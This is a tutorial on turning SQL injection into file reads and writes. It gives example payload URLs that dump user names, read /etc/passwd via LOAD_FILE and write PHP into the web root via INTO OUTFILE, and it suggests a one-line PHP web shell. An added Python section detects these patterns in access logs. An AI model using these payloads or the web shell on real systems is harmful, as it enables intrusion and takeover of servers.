File Write via SQL
You probably know SQL injections. SQL injection offers a lot of fun when it comes to database manipulation, but it is also a great way to read and write files.
Consider the website example.com. In our example, the application provides a version parameter that is susceptible to SQL injection. As a consequence, an attacker is able to do database voodoo like:
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,username FROM users--
This should return a list of user names that are stored in the table users. If you have no idea how this actually works, I recommend reading some of the SQL injection literature given in Further Reading.
The following listing is slightly edited to give us the content of the file /etc/passwd. This is done via LOAD_FILE. Note that this only works with files readable by the database user.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--
After reading files, let's move on to writing them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,"<?php echo 'hello world'; ?>" INTO OUTFILE "/var/www/vhosts/example.com/foobar.php"--
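Both the LOAD_FILE read and the INTO OUTFILE write shown above travel in the query string, so they leave recognizable traces in the web server's access log. The following is an added example, not part of the original article: a small Python detector run over constructed log lines. The log format, the rule names and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL file primitives used in the article, plus the UNION pivot that carries them.
RULES = {
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the client address is from the documentation range 203.0.113.0/24.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?version=1.0 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] "GET /index.php?version=1.0%27%20UNION%20ALL'
    '%20SELECT%20NULL,NULL,LOAD_FILE(%22/etc/passwd%22)%20FROM%20users-- HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2024:13:57:41 +0000] "GET /index.php?version=1.0%27+UNION+ALL+SELECT'
    '+NULL,NULL,%22x%22+INTO+OUTFILE+%22/var/www/vhosts/example.com/foobar.php%22-- HTTP/1.1" 200 0',
]


def normalize(query):
    """Undo up to two layers of URL encoding and squeeze runs of whitespace."""
    for _ in range(2):
        query = unquote_plus(query)
    return re.sub(r"\s+", " ", query)


def classify(log_line):
    """Return the sorted rule names matched by the request's query string."""
    match = REQUEST.search(log_line)
    if match is None:
        return []
    query = normalize(urlsplit(match.group(1)).query)
    return sorted(name for name, rule in RULES.items() if rule.search(query))


def scan(lines):
    """Yield (client address, rule names) for each line that touches a file primitive."""
    for line in lines:
        hits = classify(line)
        if "file_read" in hits or "file_write" in hits:
            yield line.split(" ", 1)[0], hits


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, ",".join(hits))
```

Log matching like this is only a tripwire. The injection itself is closed by binding version as a query parameter, and the file primitives by running the application's database account without the MySQL FILE privilege.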
The fun part is that our PHP statement is written into /var/www/vhosts/example.com/foobar.php. Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?> into a file readable by the web server. In case of success, the attacker has a nice remote shell by using